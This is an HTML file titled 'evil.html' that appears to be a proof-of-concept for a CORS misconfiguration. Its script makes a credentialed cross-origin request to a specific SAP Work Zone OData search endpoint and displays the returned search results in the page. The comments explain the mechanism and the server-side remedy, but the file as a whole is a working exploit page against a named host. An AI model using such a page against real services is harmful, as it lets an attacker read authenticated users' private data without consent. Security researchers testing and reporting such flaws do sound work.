evil.html
<!DOCTYPE html>
<html>
<body>
<p id="demo">Fetch a resource to change this text.</p>
<script>
// Endpoint under test: an OData search URL on a different origin than this page.
// getText() sends the request with credentials: 'include', so the body is only
// readable here if that server's CORS response headers name this page's origin
// and allow credentials. The remedy for an unexpected read is on the server:
// return Access-Control-Allow-Origin only for an allow-list of trusted origins.
const searchSummaryUrl = "https://swzdevintegration.workzonelts.cfapps.sap.hana.ondemand.com/dynamic_dest/JAM/api/v1/OData/SearchSummary?Query=%27martin%27&$expand=Results/ObjectReference&$select=Results/ObjectReference/Type,Results/ObjectReference/Title,Results/ObjectReference/WebURL&_=1629367477811";
getText(searchSummaryUrl);
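/**
 * Requests `file` in CORS mode with the browser's stored credentials attached
 * and shows the response body in the #demo paragraph.
 *
 * With credentials: 'include' browsers reject a wildcard
 * Access-Control-Allow-Origin, so a body that becomes readable here means the
 * server named this page's origin explicitly and sent
 * Access-Control-Allow-Credentials: true. If that origin is not meant to be
 * trusted, the server's origin allow-list is what needs fixing.
 *
 * @param {string} file - URL of the resource to request.
 * @returns {Promise<void>} Resolves once #demo has been updated; rejects if
 *   fetch() fails (for example when the browser blocks the cross-origin read)
 *   or the body cannot be read.
 */
async function getText(file) {
  const response = await fetch(file, {
    method: 'GET',
    // The body is exposed to this script only if the response's CORS headers
    // permit this page's origin.
    mode: 'cors',
    // Revalidate with the server rather than trusting a cached copy.
    cache: 'no-cache',
    // Attach cookies / HTTP auth for the target origin to the request.
    credentials: 'include',
    headers: {},
    redirect: 'follow',
    // Do not disclose this page's URL to the target.
    referrerPolicy: 'no-referrer',
  });
  const bodyText = await response.text();
  // The body comes from another origin and is untrusted. Writing it through
  // textContent displays it verbatim; innerHTML would parse it as markup and
  // let anything embedded in the response run in this page.
  document.getElementById("demo").textContent = bodyText;
}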
</script>
</body>
</html>